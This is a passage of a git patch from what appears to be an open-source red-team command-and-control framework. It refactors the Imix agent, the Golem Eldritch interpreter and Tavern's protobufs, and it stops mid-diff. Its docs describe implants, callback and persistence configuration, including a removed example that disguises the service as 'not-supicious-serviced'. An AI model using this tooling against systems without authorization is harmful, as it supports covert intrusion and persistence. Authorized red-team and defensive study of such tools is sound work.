From bfd1eb96000e9960b117bef8611d215d79e364da Mon Sep 17 00:00:00 2001 From: KCarretto Date: Sat, 27 Jan 2024 01:15:20 -0500 Subject: [PATCH] [feature] Eldritch & Imix Refactor (#509) * Refactors eldritch, introduces `eldritch::Runtime` * Refactors imix, introduces `imix::Agent` and `imix::Config` * Refactors our protobufs, creating new `eldritch` package for language specific types --- README.md | 24 +- bin/golem_cli_test/eldritch_test.tome | 2 +- bin/golem_cli_test/hello_world.tome | 2 +- docs/_docs/dev-guide/introduction.md | 44 +- docs/_docs/user-guide/imix.md | 58 +- go.mod | 2 +- go.sum | 8 +- implants/Cargo.toml | 2 + implants/golem/Cargo.toml | 2 +- implants/golem/src/inter/eval.rs | 2 +- implants/golem/src/main.rs | 144 ++- implants/golem/tests/cli.rs | 4 +- implants/imix/Cargo.toml | 4 +- .../{main.eld => main.eldritch} | 0 implants/imix/src/agent.rs | 127 ++ implants/imix/src/config.rs | 202 +++ implants/imix/src/exec.rs | 215 ---- implants/imix/src/init.rs | 306 ----- implants/imix/src/install.rs | 170 +-- implants/imix/src/lib.rs | 65 +- implants/imix/src/main.rs | 441 +------ implants/imix/src/task.rs | 97 ++ implants/imix/src/tasks.rs | 308 ----- implants/imix/src/version.rs | 7 + implants/lib/c2/Cargo.toml | 4 +- implants/lib/c2/build.rs | 4 +- implants/lib/c2/src/c2.rs | 133 +- implants/lib/c2/src/c2_manual.rs | 278 +++-- implants/lib/c2/src/lib.rs | 4 +- implants/lib/eldritch/Cargo.toml | 12 +- implants/lib/eldritch/build.rs | 37 +- implants/lib/eldritch/src/eldritch.rs | 138 +++ implants/lib/eldritch/src/lib.rs | 302 +---- .../lib/eldritch/src/pivot/arp_scan_impl.rs | 2 +- implants/lib/eldritch/src/runtime.rs | 550 +++++++++ implants/lib/tavern/graphql/schema.graphql | 1081 ----------------- tavern/internal/c2/api_claim_tasks.go | 13 +- tavern/internal/c2/api_report_file.go | 17 +- tavern/internal/c2/api_report_file_test.go | 45 +- tavern/internal/c2/api_report_process_list.go | 6 +- .../c2/api_report_process_list_test.go | 37 +- tavern/internal/c2/c2pb/c2.pb.go | 712 +++-------- tavern/internal/c2/c2test/ent.go | 17 +- tavern/internal/c2/epb/eldritch.pb.go | 602 +++++++++ .../c2/{c2pb => epb}/enum_process_status.go | 2 +- .../{c2pb => epb}/enum_process_status_test.go | 32 +- tavern/internal/c2/generate.go | 3 +- tavern/internal/c2/{ => proto}/c2.proto | 54 +- tavern/internal/c2/proto/eldritch.proto | 61 + tavern/internal/ent/gql_where_input.go | 9 +- tavern/internal/ent/host/host.go | 2 +- tavern/internal/ent/hostprocess.go | 8 +- .../internal/ent/hostprocess/hostprocess.go | 14 +- tavern/internal/ent/hostprocess/where.go | 10 +- tavern/internal/ent/hostprocess_create.go | 12 +- tavern/internal/ent/hostprocess_update.go | 10 +- tavern/internal/ent/migrate/schema.go | 4 +- tavern/internal/ent/mutation.go | 13 +- tavern/internal/ent/schema/host_process.go | 4 +- .../graphql/generated/ent.generated.go | 35 +- .../graphql/generated/root_.generated.go | 22 +- tavern/internal/graphql/gqlgen.yml | 2 +- tavern/internal/graphql/schema.graphql | 22 +- tavern/internal/graphql/schema/ent.graphql | 22 +- tavern/internal/www/schema.graphql | 22 +- 65 files changed, 2646 insertions(+), 3947 deletions(-) rename implants/imix/install_scripts/install_service/{main.eld => main.eldritch} (100%) create mode 100644 implants/imix/src/agent.rs create mode 100644 implants/imix/src/config.rs delete mode 100644 implants/imix/src/exec.rs delete mode 100644 implants/imix/src/init.rs create mode 100644 implants/imix/src/task.rs delete mode 100644 implants/imix/src/tasks.rs create mode 100644 
implants/imix/src/version.rs create mode 100644 implants/lib/eldritch/src/eldritch.rs create mode 100644 implants/lib/eldritch/src/runtime.rs delete mode 100644 implants/lib/tavern/graphql/schema.graphql create mode 100644 tavern/internal/c2/epb/eldritch.pb.go rename tavern/internal/c2/{c2pb => epb}/enum_process_status.go (99%) rename tavern/internal/c2/{c2pb => epb}/enum_process_status_test.go (58%) rename tavern/internal/c2/{ => proto}/c2.proto (76%) create mode 100644 tavern/internal/c2/proto/eldritch.proto diff --git a/README.md b/README.md index 8874d7be0..50d0b8135 100644 --- a/README.md +++ b/README.md @@ -60,29 +60,7 @@ ENABLE_TEST_DATA=1 go run ./tavern ```bash git clone https://github.com/spellshift/realm.git -cd realm/implants/imix - -# Create the config file -cat < /tmp/imix-config.json -{ - "service_configs": [], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc/" - } - ] - } -} -EOF - -cargo run -- -c /tmp/imix-config.json +cd realm/implants/imix && cargo run ``` diff --git a/bin/golem_cli_test/eldritch_test.tome b/bin/golem_cli_test/eldritch_test.tome index e9b1cd590..687a23062 100644 --- a/bin/golem_cli_test/eldritch_test.tome +++ b/bin/golem_cli_test/eldritch_test.tome @@ -1 +1 @@ -str(dir(file)) \ No newline at end of file +print(dir(file)) diff --git a/bin/golem_cli_test/hello_world.tome b/bin/golem_cli_test/hello_world.tome index 6ec99703f..239e5304a 100644 --- a/bin/golem_cli_test/hello_world.tome +++ b/bin/golem_cli_test/hello_world.tome @@ -4,4 +4,4 @@ def test(): res = res + i return res -str(test()) \ No newline at end of file +print(test()) diff --git a/docs/_docs/dev-guide/introduction.md b/docs/_docs/dev-guide/introduction.md index e11655faf..f62d84527 100644 --- a/docs/_docs/dev-guide/introduction.md +++ b/docs/_docs/dev-guide/introduction.md @@ -6,11 +6,13 @@ description: Read this before contributing to Realm! permalink: dev-guide/introduction --- # Overview + This section of the documentation is meant for new Realm-contributors, and should be read in it's entirety before submitting your first PR. Below you can learn more about our testing & documentation requirements, project layout, and some of the internals of our codebase. ## Contribution Guidelines ### Documentation + Realm is under heavy active development and documentation can go stale quickly if it's not actively maintained. Please take a moment to familiarize yourself with both the **[Developer Documentation](/dev-guide)** you're reading now as well as the **[User-Facing Documentation](/user-guide)**. When submitting a code change, please include updates to the relevant portions of our documentation. We will do our best during code review to catch changes that require documentation updates, but sometimes things will slip by. If you notice a discrepancy between our codebase and the documentation, please kindly [file an issue](https://github.com/spellshift/realm/issues/new?labels=documentation&title=Documentation%20Discrepancy:&body=Please%20include%20the%20location%20of%20the%20inaccurate%20documentation%20and%20a%20helpful%20description%20of%20what%20needs%20improvement.) to track it or submit a PR to correct it. 
You can use the ["Edit this page"](https://github.com/spellshift/realm/edit/main/docs/_docs/dev-guide/introduction.md) feature in the right navbar of the documentation to quickly navigate to the appropriate section of documentation that requires an update. @@ -22,14 +24,17 @@ Realm contains code across a variety of languages and frameworks. Testing helps #### Eldritch Any methods added to the Eldritch Standard Library should have tests collocated in the method's `_impl.rs` file. Here are a few things to keep in mind: + * Tests should be cross platform - * Rely on [NamedTempFile](https://docs.rs/tempfile/1.1.1/tempfile/struct.NamedTempFile.html) for temporary files - * Rely on [path.join](https://doc.rust-lang.org/stable/std/path/struct.Path.html) to construct OS-agnostic paths + * Rely on [NamedTempFile](https://docs.rs/tempfile/1.1.1/tempfile/struct.NamedTempFile.html) for temporary files + * Rely on [path.join](https://doc.rust-lang.org/stable/std/path/struct.Path.html) to construct OS-agnostic paths #### Tavern ##### Tavern Tests (Golang) + All code changes to Tavern must be tested. Below are some standards for test writing that can help improve your PRs: + * Please submit relevant tests in the same PR as your code change * For GraphQL API Tests, please refer to our [YAML specification](/dev-guide/tavern#yaml-test-reference-graphql) * For gRPC API Tests, please refer to our [YAML specification](/dev-guide/tavern#yaml-test-reference-grpc) @@ -37,11 +42,12 @@ All code changes to Tavern must be tested. Below are some standards for test wri * We rely on the standard [testify](https://github.com/stretchr/testify) assert & require libraries for ensuring expected values (or errors) are returned * To enable a variety of inputs for a test case, we rely on closure-driven testing for Golang, you can read more about it [here](https://medium.com/@cep21/closure-driven-tests-an-alternative-style-to-table-driven-tests-in-go-628a41497e5e) * Reusable test code should go in a sub-package suffixed with test - * For example, reusable test code for the `ent` package would be located in the `ent/enttest` package - * This convention is even used in the Golang standard library (e.g. [net/http](https://pkg.go.dev/net/http/httptest)) + * For example, reusable test code for the `ent` package would be located in the `ent/enttest` package + * This convention is even used in the Golang standard library (e.g. [net/http](https://pkg.go.dev/net/http/httptest)) * Please use existing tests as a reference for writing new tests ##### Tavern Tests (Front End) + At the time of writing, the Tavern UI is still in an early stage, and therefore minimal testing exists for it. Once the UI is considered more stable, this documentation will be updated. If the Tavern UI is useable and this documentation still exists, please [file an issue](https://github.com/spellshift/realm/issues/new?labels=documentation&title=Documentation%20Discrepancy:&body=Please%20include%20the%20location%20of%20the%20inaccurate%20documentation%20and%20a%20helpful%20description%20of%20what%20needs%20improvement.). ### Linear History @@ -53,47 +59,55 @@ In an attempt to reduce the complexity of merges, we enforce a linear history fo Throughout the documentation terms like "agent" or "implant" are used to reference various components (or types of components) in our codebase. Below we attempt to define some of those terms, to add some clarity to that other documentation. ### Host + A Host is a system that is in-scope for the current engagement. 
It is used to establish a logical boundary between different systems in an engagement (e.g. between a webserver and a database). This enables operations to target a particular system, for example you may want to list files on a web server in your engagement scope. ### Implant + References malicious code or persistence mechanisms that are deployed to compromise target systems. ### Agent + An Agent is a type of implant which retrieves execution instructions by connecting to our backend infrastructure (calling back) and querying for new tasks. ### Beacon + A Beacon is a running instance of an Agent. A Host may have multiple active Beacons that use the same underlying Agent. ### Task + A Task represents a set of instructions for an Agent to perform. For example, listing files could be a Task. When listing files across various Beacons, one Task per Beacon will be created for tracking the individual execution output. ### Eldritch + Eldritch is our Pythonic Domain Specific Language (DSL), which can be used to progammatically define red team operations. Many of the language's built-in features do not rely on system binaries. For more information, please see the [Eldritch section](/user-guide/eldritch) of the documentation. ### Tome + A Tome is a prebuilt Eldritch bundle, which provides execution instructions to a Beacon. Tomes can embed files and accept parameters to change their behavior at runtime. Tavern's built-in Tomes are defined [here](https://github.com/spellshift/realm/tree/main/tavern/tomes). # Project Structure + * **[.devcontainer](https://github.com/spellshift/realm/tree/main/.devcontainer)** contains settings required for configuring a VSCode dev container that can be used for Realm development * **[.github](https://github.com/spellshift/realm/tree/main/.github)** contains GitHub related actions, issue templates, etc * **[docker](https://github.com/spellshift/realm/tree/main/docker)** docker containers for production builds * **[docs](https://github.com/spellshift/realm/tree/main/docs)** contains the Jekyll code for the documentation site that you're reading now! * **[implants](https://github.com/spellshift/realm/tree/main/implants)** is the parent folder of any implant executables or libraries - * **[implants/golem](https://github.com/spellshift/realm/tree/main/implants/golem)** the stand-alone interpreter that implements the eldritch language (Rust) - * **[implants/golem/embed_files_golem_prod](https://github.com/spellshift/realm/tree/main/implants/golem/embed_files_golem_prod)** Files and scripts that will be embedded into production builds of imix, golem, and eldritch. 
These files can be accessed through the [`assets` module.](https://docs.realm.pub/user-guide/eldritch#assets) - * **[implants/imix](https://github.com/spellshift/realm/tree/main/implants/imix)** is our agent that executes eldritch tomes (Rust) - * **[implants/lib/eldritch](https://github.com/spellshift/realm/tree/main/implants/lib/eldritch)** is the source of our eldritch library (Rust) - * **[implants/lib/tavern](https://github.com/spellshift/realm/tree/main/implants/lib/tavern)** is the source of our agents graphql API to interface with Tavern (Rust) + * **[implants/golem](https://github.com/spellshift/realm/tree/main/implants/golem)** the stand-alone interpreter that implements the eldritch language (Rust) + * **[implants/golem/embed_files_golem_prod](https://github.com/spellshift/realm/tree/main/implants/golem/embed_files_golem_prod)** Files and scripts that will be embedded into production builds of imix, golem, and eldritch. These files can be accessed through the [`assets` module.](https://docs.realm.pub/user-guide/eldritch#assets) + * **[implants/imix](https://github.com/spellshift/realm/tree/main/implants/imix)** is our agent that executes eldritch tomes (Rust) + * **[implants/lib/eldritch](https://github.com/spellshift/realm/tree/main/implants/lib/eldritch)** is the source of our eldritch library (Rust) * **[tavern](https://github.com/spellshift/realm/tree/main/tavern)** is the parent folder of Tavern related code and packages, and stores the `main.go` executable for the service - * **[tavern/auth](https://github.com/spellshift/realm/tree/main/tavern/auth)** is a package for managing authentication for Tavern, and is used by various packages that rely on obtaining viewer information - * **[tavern/internal/ent](https://github.com/spellshift/realm/tree/main/tavern/internal/ent)** contains models and related code for interacting with the database (most of this is code generated by **[entgo](https://entgo.io/))** - * **[tavern/internal/ent/schema](https://github.com/spellshift/realm/tree/main/tavern/internal/ent/schema)** contains the schema definitions for our DB models - * **[tavern/internal/graphql](https://github.com/spellshift/realm/tree/main/tavern/internal/graphql)** contains our GraphQL definitions and resolvers (most of this code is generated by **[entgo](https://entgo.io/)** and **[gqlgen](https://github.com/99designs/gqlgen))** - * **[tavern/internal](https://github.com/spellshift/realm/tree/main/tavern/internal)** contains various internal packages that makeup Tavern - * **[tavern/internal/www](https://github.com/spellshift/realm/tree/main/tavern/internal/www)** contains Tavern's UI code + * **[tavern/auth](https://github.com/spellshift/realm/tree/main/tavern/auth)** is a package for managing authentication for Tavern, and is used by various packages that rely on obtaining viewer information + * **[tavern/internal/ent](https://github.com/spellshift/realm/tree/main/tavern/internal/ent)** contains models and related code for interacting with the database (most of this is code generated by **[entgo](https://entgo.io/))** + * **[tavern/internal/ent/schema](https://github.com/spellshift/realm/tree/main/tavern/internal/ent/schema)** contains the schema definitions for our DB models + * **[tavern/internal/graphql](https://github.com/spellshift/realm/tree/main/tavern/internal/graphql)** contains our GraphQL definitions and resolvers (most of this code is generated by **[entgo](https://entgo.io/)** and **[gqlgen](https://github.com/99designs/gqlgen))** + * 
**[tavern/internal](https://github.com/spellshift/realm/tree/main/tavern/internal)** contains various internal packages that makeup Tavern + * **[tavern/internal/www](https://github.com/spellshift/realm/tree/main/tavern/internal/www)** contains Tavern's UI code * **[terraform](https://github.com/spellshift/realm/tree/main/terraform)** contains the Terraform used to deploy a production ready Realm instance. See [Tavern User Guide](https://docs.realm.pub/user-guide/tavern) to learn how to use. * **[tests](https://github.com/spellshift/realm/tree/main/tests)** miscellaneous files and example code used for testing. Generally won't be used but required for some niche situations like deadlocking cargo build. * **[vscode](https://github.com/spellshift/realm/tree/main/vscode)** contains our Eldritch VSCode integration source code **(Unmaintained)** # Where to Start? + If you'd like to make a contribution to Realm but aren't sure where to start or what features could use help, please consult our [Good First Issues](https://github.com/spellshift/realm/labels/good%20first%20issue) for some starting ideas. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 4f6220303..20f348466 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -8,61 +8,21 @@ permalink: user-guide/imix ## What is Imix Imix is the default agent for realm. -Imix currently only supports http callbacks which interact directly with the graphql API. +Imix currently only supports http(s) callbacks to Tavern's gRPC API. ## Configuration -By default Imix is configured using a JSON file at run time. +Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. -The config is specified at run time with the `-c` flag. -For example: +| Env Var | Description | Default | Required | +| ------- | ----------- | ------- | -------- | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:80` | No | +| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | +| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | -```bash -./imix -c /tmp/imix-config.json -``` - -The imix config is as follows: - -```json -{ - "service_configs": [ - { - "name": "imix", - "description": "Imix c2 agent", - "executable_name": "imix", - "executable_args": "" - } - ], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc" - } - ] - } -} -``` +## Logging -- `service_configs`: Defining persistence variables. - - `name`: The name of the service to install as. - - `description`: If possible set a description for the service. - - `executable_name`: What imix should be named Eg. `not-supicious-serviced`. - - `executable_args`: Args to append after the executable. -- `target_forward_connect_ip`: The IP address that you the red teamer would interact with the host through. This is to help keep track of agents when a hosts internal IP is different from the one you interact with in the case of a host behind a proxy. -- `target_name`: Currently unused. -- `callback_config`: Define where and when the agent should callback. - - `interval`: Number of seconds between callbacks. - - `jitter`: Currently unused. - - `timeout`: The number of seconds to wait before aborting a connection attempt. 
- - `c2_config` Define where the c2 should callback to. - - `priority`: The index that a domain should have. - - `uri`: The full URI of the callback endpoint. +At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. When building a release version of imix, logging is disabled and is not included in the released binary. ## Installation diff --git a/go.mod b/go.mod index 1b3a04926..b1a37341a 100644 --- a/go.mod +++ b/go.mod @@ -12,6 +12,7 @@ require ( github.com/google/go-cmp v0.6.0 github.com/hashicorp/go-multierror v1.1.1 github.com/mattn/go-sqlite3 v1.14.16 + github.com/prometheus/client_golang v1.18.0 github.com/stretchr/testify v1.8.2 github.com/urfave/cli v1.22.5 github.com/vektah/gqlparser/v2 v2.5.10 @@ -45,7 +46,6 @@ require ( github.com/mitchellh/go-wordwrap v1.0.1 // indirect github.com/mitchellh/mapstructure v1.5.0 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect - github.com/prometheus/client_golang v1.18.0 // indirect github.com/prometheus/client_model v0.5.0 // indirect github.com/prometheus/common v0.45.0 // indirect github.com/prometheus/procfs v0.12.0 // indirect diff --git a/go.sum b/go.sum index cbbd0abfc..a4e4917f8 100644 --- a/go.sum +++ b/go.sum @@ -60,7 +60,6 @@ github.com/hashicorp/golang-lru/v2 v2.0.3 h1:kmRrRLlInXvng0SmLxmQpQkpbYAvcXm7NPD github.com/hashicorp/golang-lru/v2 v2.0.3/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM= github.com/hashicorp/hcl/v2 v2.18.1 h1:6nxnOJFku1EuSawSD81fuviYUV8DxFr3fp2dUi3ZYSo= github.com/hashicorp/hcl/v2 v2.18.1/go.mod h1:ThLC89FV4p9MPW804KVbe/cEXoQ8NZEh+JtMeeGErHE= -github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI= github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kylelemons/godebug v0.0.0-20170820004349-d65d576e9348 h1:MtvEpTB6LX3vkb4ax0b5D2DHbNAUsen0Gx5wZoq3lV4= @@ -82,6 +81,7 @@ github.com/prometheus/common v0.45.0 h1:2BGz0eBc2hdMDLnO/8n0jeB3oPrt2D08CekT0lne github.com/prometheus/common v0.45.0/go.mod h1:YJmSTw9BoKxJplESWWxlbyttQR4uaEcGyv9MZjVOJsY= github.com/prometheus/procfs v0.12.0 h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k6Bo= github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo= +github.com/rogpeppe/go-internal v1.10.0 h1:TMyTOH3F/DB16zRVcYyreMH6GnZZrwQVAoYjRBZyWFQ= github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf35Ld67mk= github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= @@ -117,15 +117,11 @@ golang.org/x/mod v0.13.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= -golang.org/x/oauth2 v0.11.0 h1:vPL4xzxBM4niKCW6g9whtaWVXTJf1U5e4aZxxFx/gbU= -golang.org/x/oauth2 v0.11.0/go.mod h1:LdF7O/8bLR/qWK9DrpXmbHLTouvRHK0SgJl0GmDBchk= golang.org/x/oauth2 v0.12.0 h1:smVPGxink+n1ZI5pkQa8y6fZT0RW0MgCO5bFpepy4B4= golang.org/x/oauth2 v0.12.0/go.mod h1:A74bZ3aGXgCY0qaIC9Ahg6Lglin4AMAco8cIv9baba4= golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ= 
golang.org/x/sync v0.4.0/go.mod h1:FU7BRWz2tNW+3quACPkgCx/L+uEAv1htQ0V83Z9Rj+Y= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= -golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.15.0 h1:h48lPFYpsTvQJZF4EKyI4aLHaev3CxivZmv7yZig9pc= golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= @@ -146,8 +142,8 @@ google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp0 google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I= google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/implants/Cargo.toml b/implants/Cargo.toml index a6f4fbb0a..e8d293edc 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -27,6 +27,7 @@ hyper = { version = "1", features = ["full"] } ipnetwork = "0.20.0" itertools = "0.10" lsp-types = "0.93.0" +log = "0.4.20" md5 = "0.7.0" netstat2 = "0.9.1" network-interface = "1.0.1" @@ -35,6 +36,7 @@ object = "0.31.1" openssl = "0.10.55" pnet = "0.34.0" predicates = "2.1" +pretty_env_logger = "0.5.0" prost = "0.12" prost-types = "0.12" rand = "0.8.5" diff --git a/implants/golem/Cargo.toml b/implants/golem/Cargo.toml index 21f373504..af9326984 100644 --- a/implants/golem/Cargo.toml +++ b/implants/golem/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "golem" -version = "0.0.4" +version = "0.0.5" edition = "2021" [dependencies] diff --git a/implants/golem/src/inter/eval.rs b/implants/golem/src/inter/eval.rs index 4d6b5556c..9016f5563 100644 --- a/implants/golem/src/inter/eval.rs +++ b/implants/golem/src/inter/eval.rs @@ -369,7 +369,7 @@ impl LspContext for Context { } pub(crate) fn globals() -> Globals { - eldritch::get_eldritch().unwrap() + eldritch::Runtime::globals() } pub(crate) fn dialect() -> Dialect { diff --git a/implants/golem/src/main.rs b/implants/golem/src/main.rs index 3588a1269..787a18b87 100644 --- a/implants/golem/src/main.rs +++ b/implants/golem/src/main.rs @@ -1,50 +1,68 @@ extern crate eldritch; extern crate golem; +use anyhow::{anyhow, Result}; use clap::{Arg, Command}; +use eldritch::pb::Tome; +use eldritch::{Output, Runtime}; +use std::collections::HashMap; use std::fs; use std::process; -use std::thread; - -use eldritch::{eldritch_run, StdPrintHandler}; +use tokio::task::JoinHandle; mod inter; -async fn execute_tomes_in_parallel( - tome_name_and_content: Vec<(String, String)>, -) -> anyhow::Result<(i32, Vec)> { - // Queue async tasks - let mut all_tome_futures: Vec<(String, _)> = vec![]; - for tome_data in tome_name_and_content { - let tmp_row = ( - tome_data.0.clone().to_string(), - thread::spawn(|| eldritch_run(tome_data.0, 
tome_data.1, None, &StdPrintHandler {})), - ); - all_tome_futures.push(tmp_row) +struct ParsedTome { + pub path: String, + pub eldritch: String, +} + +struct Handle { + handle: JoinHandle<()>, + path: String, + output: Output, +} + +async fn run_tomes(tomes: Vec) -> Result> { + let mut handles = Vec::new(); + for tome in tomes { + let (runtime, output) = Runtime::new(); + let handle = tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch: tome.eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }); + handles.push(Handle { + handle, + path: tome.path, + output, + }); } - let mut error_code = 0; - let mut result: Vec = Vec::new(); - for tome_task in all_tome_futures { - let tome_name: String = tome_task.0; - // Join our - let tome_result_thread_join = match tome_task.1.join() { - Ok(local_thread_join_res) => local_thread_join_res, - Err(_) => { - error_code = 1; - Err(anyhow::anyhow!("An error occured waiting for the tome thread to complete while executing {tome_name}.")) + let mut result = Vec::new(); + for handle in handles { + match handle.handle.await { + Ok(_) => {} + Err(err) => { + eprintln!( + "error waiting for tome to complete: {} {}", + handle.path, err + ); + continue; } }; - - match tome_result_thread_join { - Ok(local_tome_result) => result.push(local_tome_result), - Err(task_error) => { - error_code = 1; - eprintln!("[TASK ERROR] {tome_name}: {task_error}"); - } + let mut out = handle.output.collect(); + let errors = handle.output.collect_errors(); + if errors.len() > 0 { + return Err(anyhow!("tome execution failed: {:?}", errors)); } + println!("OUTPUT: {:?}", out); + result.append(&mut out); } - Ok((error_code, result)) + + Ok(result) } fn main() -> anyhow::Result<()> { @@ -65,14 +83,16 @@ fn main() -> anyhow::Result<()> { .get_matches(); if matches.contains_id("INPUT") { - // Get list of files + // Read Tomes let tome_files = matches.try_get_many::("INPUT").unwrap().unwrap(); - - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + let mut parsed_tomes: Vec = Vec::new(); for tome in tome_files { let tome_path = tome.to_string().clone(); let tome_contents = fs::read_to_string(tome_path.clone())?; - tome_files_and_content.push((tome_path, tome_contents)) + parsed_tomes.push(ParsedTome { + path: tome_path, + eldritch: tome_contents, + }); } let runtime = tokio::runtime::Builder::new_multi_thread() @@ -80,14 +100,13 @@ fn main() -> anyhow::Result<()> { .build() .unwrap(); - let (error_code, result) = - match runtime.block_on(execute_tomes_in_parallel(tome_files_and_content)) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + let (error_code, result) = match runtime.block_on(run_tomes(parsed_tomes)) { + Ok(response) => (0, response), + Err(error) => { + eprint!("failed to execute tome {:?}", error); + (-1, Vec::new()) + } + }; if result.len() > 0 { println!("{:?}", result); @@ -96,7 +115,7 @@ fn main() -> anyhow::Result<()> { } else if matches.contains_id("interactive") { inter::interactive_main()?; } else { - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + let mut parsed_tomes: Vec = Vec::new(); for embedded_file_path in eldritch::assets::Asset::iter() { let filename = match embedded_file_path.split(r#"/"#).last() { Some(local_filename) => local_filename, @@ -123,7 +142,10 @@ fn main() -> anyhow::Result<()> { "".to_string() } }; - tome_files_and_content.push((tome_path, tome_contents)) + parsed_tomes.push(ParsedTome { + path: 
tome_path, + eldritch: tome_contents, + }); } } let runtime = tokio::runtime::Builder::new_current_thread() @@ -131,14 +153,13 @@ fn main() -> anyhow::Result<()> { .build() .unwrap(); - let (error_code, result) = - match runtime.block_on(execute_tomes_in_parallel(tome_files_and_content)) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + let (error_code, result) = match runtime.block_on(run_tomes(parsed_tomes)) { + Ok(response) => (0, response), + Err(error) => { + eprint!("error executing tomes {:?}", error); + (-1, Vec::new()) + } + }; if result.len() > 0 { println!("{:?}", result); @@ -154,14 +175,13 @@ mod tests { use super::*; #[tokio::test] async fn test_golem_execute_tomes_in_parallel() -> anyhow::Result<()> { - let tome_files_and_content = [( - "test_hello.eldritch".to_string(), - "'hello world'".to_string(), - )]; - let (error_code, result) = - execute_tomes_in_parallel(tome_files_and_content.to_vec()).await?; - assert_eq!(error_code, 0); - assert!(result.contains(&"hello world".to_string())); + let parsed_tomes = Vec::from([ParsedTome { + path: "test_hello.eldritch".to_string(), + eldritch: r#"print("hello world")"#.to_string(), + }]); + + let out = run_tomes(parsed_tomes).await?; + assert_eq!("hello world".to_string(), out.join("")); Ok(()) } } diff --git a/implants/golem/tests/cli.rs 